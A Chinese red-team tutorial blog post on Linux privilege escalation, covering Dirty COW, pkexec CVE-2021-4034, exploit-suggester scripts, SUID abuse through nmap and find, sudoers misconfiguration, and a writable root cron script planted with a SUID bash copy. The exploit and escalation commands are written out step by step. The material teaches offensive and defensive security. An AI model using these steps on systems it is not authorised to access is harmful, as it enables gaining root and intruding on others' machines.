连载|浅谈红队中的提权(八)-Linux 提权

本文来自无问社区,更多实战内容可前往查看http://wwlib.cn/index.php/artread/artid/10165.html续接上文 谈完红队中的权限维持后就要总结一下如何提权了 ,之前有聊过Windows提权,这里讲讲自己对Linux提权的总结。

0x01 Linux 提权

1、CVE-2016-5195

脏牛漏洞(CVE-2016-5195)是个很经典的漏洞了,从 2007 年发布 2.6.22 版本开始,直到 2016 年 10 月 18 日为止,这中间发行的所有 Linux 系统都受影响。

使用 searchsploit 看看有哪些可以利用的 POC。

searchsploit Dirty COW

可以看到内核版本在 2.6.22 至 3.9 的 Linux 都受到了影响。

使用 uname 查看当前系统内核版本。

uname -sr

可以看到这个内核版本是受到影响的。

这里以 linux/local/40838.c poc 作为示例,通过 -p 查看该 POC 所在路径。

将该 POC 上传至目标后,通过 cat 40839.c 查看该 POC 的使用命令。

gcc -pthread 40839.c -o dirty -lcrypt

./dirty

2、服务提权

CVE-2021-4034

在 Polkit 的 pkexec 中存在提权漏洞,2009 年 5 月至今发布的所有 Polkit 版本都受到影响,Polkit 预装在 CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia 等多个 Linux 发行版上,所有存在 Polkit 的 Linux 系统均受影响。

Linux 系统用户可以通过查看 Polkit 版本来判断当前系统是否在受影响范围内,主流 Linux 发行版命令如下:

CentOS:

rpm -qa polkit

Ubuntu:

dpkg -l policykit-1

利用命令如下:

git clone https:

cd CVE-2021-4034

make

./cve-2021-4034

其他的服务提权还有数据库提权、NFS、Redis 提权等等,这类都需要 Linux 上部署有对应的服务或者有错误的配置才能利用。

3、工具

对于 Linux 提权的 CVE 有很多,可以使用一些工具帮助我们快速的发现当前 Linux 可能存在的提权漏洞。

linux-exploit-suggester

wget https:

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

linux-exploit-suggester-2

wget https:

chmod +x linux-exploit-suggester-2.pl

./linux-exploit-suggester-2.pl

4、SUID 提权

SUID 可以让程序调用者以文件拥有者的身份运行该文件,当我们以一个普通用户去运行一个 root 用户所属的 SUID 文件,我们就可以获取到 root 权限。

常见 Linux 中 root 文件列表如下:

nmap

vim

find

bash

more

less

nano

cp

使用以下命令查找具有 root 权限的 SUID 的文件,不同系统适用于不同的命令:

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000-print2>/dev/null

find / -user root -perm -4000-exec ls -ldb {} ;

nmap

在 Nmap 版本为 2.02 到 5.21 之间的具有交互模式,允许用户执行 shell 命令。

当 Nmap 位于以 root 权限执行的二进制文件列表中时,就可以使用交互式控制台来运行具有相同权限的 shell。

nmap --interactive

!sh

whoami

find

touch teamssix

find teamssix -exec whoami ;

5、SUDO 提权

一般情况下,在运行 sudo 命令时都是需要输入当前用户密码的,但如果运维人员为了方便可能会造成 /etc/sudoers 文件配置不当。

例如以下配置:

当我们使用 t 用户时,使用 sudo 命令就不需要输入密码。

6、计划任务

计划任务的原理是,当计划任务中有以 root 用户权限运行的脚本文件且我们能对该文件进行编辑时,就存在计划任务提权。

例如我们查看当前系统的计划任务:

cat /etc/crontab

可以看到当前有一条计划任务,该计划任务会以 root 权限每分钟执行一次 /tmp/teamssix.sh 脚本。

查看该脚本文件,发现该脚本文件允许任意用户编辑。

ls -l /tmp/teamssix.sh

编辑 /tmp/teamssix.sh 文件,添加以下内容:

cp /bin/bash /tmp/bash

chmod u+s /tmp/bash

添加的内容表示,复制 /bin/bash 到 /tmp/bash,并将 /tmp/bash 命令加上 SUID 权限。

当计划任务被执行后,就可以使用 /tmp/bash 文件进行提权了。

除了上面的方法外还有环境变量提权、root 密码复用提权等等方法,这里篇幅有限就不一一列举了。

0x02 总结

不管是 Windows 还是 Linux 提权,每天都有人在不断的研究,新的提权漏洞也层出不穷。

蓝队打补丁的速度总是要要晚于漏洞出现的速度,因此在实战中一般都是优先尝试使用新出的提权漏洞,这样成功率会更高,其次再去看看有没有一些配置不当可以被提权的地方。

所以平时有新的提权漏洞出来时,可以自己先本地复现一波,做好笔记,在实战的时候就能很快的找到相应的漏洞并去尝试利用了。

相关推荐
良许Linux1 分钟前
0.96寸OLED显示屏详解
linux·服务器·后端·互联网
星竹10 分钟前
upload-labs-master第21关超详细教程
网络安全
蜜獾云12 分钟前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
小屁不止是运维13 分钟前
麒麟操作系统服务架构保姆级教程(五)NGINX中间件详解
linux·运维·服务器·nginx·中间件·架构
Hacker_Oldv18 分钟前
WPS 认证机制
运维·服务器·wps
bitcsljl27 分钟前
Linux 命令行快捷键
linux·运维·服务器
ac.char30 分钟前
在 Ubuntu 下使用 Tauri 打包 EXE 应用
linux·运维·ubuntu
Cachel wood1 小时前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
Youkiup1 小时前
【linux 常用命令】
linux·运维·服务器
qq_297504611 小时前
【解决】Linux更新系统内核后Nvidia-smi has failed...
linux·运维·服务器